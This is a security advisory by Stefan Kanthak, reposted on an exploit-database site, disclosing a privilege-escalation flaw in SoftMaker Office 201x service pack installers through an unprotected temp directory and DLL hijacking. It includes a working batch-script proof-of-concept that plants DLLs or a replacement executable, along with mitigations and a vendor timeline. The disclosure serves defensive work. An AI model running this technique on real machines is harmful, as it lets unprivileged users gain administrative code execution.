0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SoftMaker Office 201x Privilege Escalation Vulnerability
[Hi @ll,
the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.
The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract
its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".
"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent
"%TEMP%\", i.e. allows full access for the UNPRIVILEGED user.
For this well-known vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html>
Due to the embedded application manifest which specifies
"requireAdministrator" the executable installer can only be run
with administrative rights.
JFTR: if written properly, it would create a PROTECTED directory
"%TEMP%\7zSxxxxxxxx\", writable only for privileged users!
The UNPRIVILEGED user as well as any program running with the
users credentials can modify the extracted files, for example
"%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with
administrative rights, resulting in arbitrary code execution
with elevation of privilege.
Additionally "spsetup.exe" is vulnerable to DLL hijacking,
another well-known vulnerability.
See <https://capec.mitre.org/data/definitions/471.html>,
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
<https://technet.microsoft.com/en-us/library/2269637.aspx>,
<https://msdn.microsoft.com/en-us/library/ff919712.aspx> and
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>
Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the
unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which
are loaded by "spsetup.exe", again resulting in arbitrary code
execution with elevation of privilege!
Proof-of-concept:
~~~~~~~~~~~~~~~~~
0. download <http://www.softmaker.net/down/ofw16_763.exe> and
save it in an arbitrary directory;
1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
(see <http://home.arcor.de/skanthak/sentinel.html> alias
<https://skanthak.homepage.t-online.de/sentinel.html>) and
save it in an(other) arbitrary directory;
2. save the following batch script in same the directory as
SENTINEL.DLL:
--- OFW16_873.CMD ---
:WAIT
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---
3. start the batch script;
4. execute ofw16_873.exe and notice the message boxes displayed
by SENTINEL.DLL.
PWNED!
5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE>
to the same directory as the batch script;
6. in the batch script replace the 3 lines Copy ... with
Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"
7. start the batch script;
8. execute ofw16_873.exe and notice the message box displayed
by SENTINEL.EXE.
PWNED!
Mitigations:
~~~~~~~~~~~~
* Don't use executable installers! NEVER!
Don't use self-extractors! NEVER!
See <http://seclists.org/fulldisclosure/2015/Nov/101> and
<http://seclists.org/fulldisclosure/2015/Dec/86> plus
<http://home.arcor.de/skanthak/!execute.html> alias
<https://skanthak.homepage.t-online.de/!execute.html> for more
information.
* Practice STRICT privilege separation: NEVER use the so-called
"protected" administrator account(s) created during Windows
setup which use the same "%TEMP%" for unprivileged and privileged
processes!
* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%";
use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
decode it to "deny execution of files in this directory for
everyone, inheritable to all files in all subdirectories".
stay tuned
Stefan Kanthak
Timeline:
~~~~~~~~~
2016-12-15 sent vulnerability report to vendor
no reply, not even an acknowledegement of receipt
2016-12-23 resent vulnerability report to vendor, cc CERT at
german BSI
no reply, not even an acknowledegement of receipt
2016-12-27 CERT at german BSI contacts vendor offering help
no reply, not even an acknowledegement of receipt
2016-12-31 report published
# 0day.today [2024-11-14] #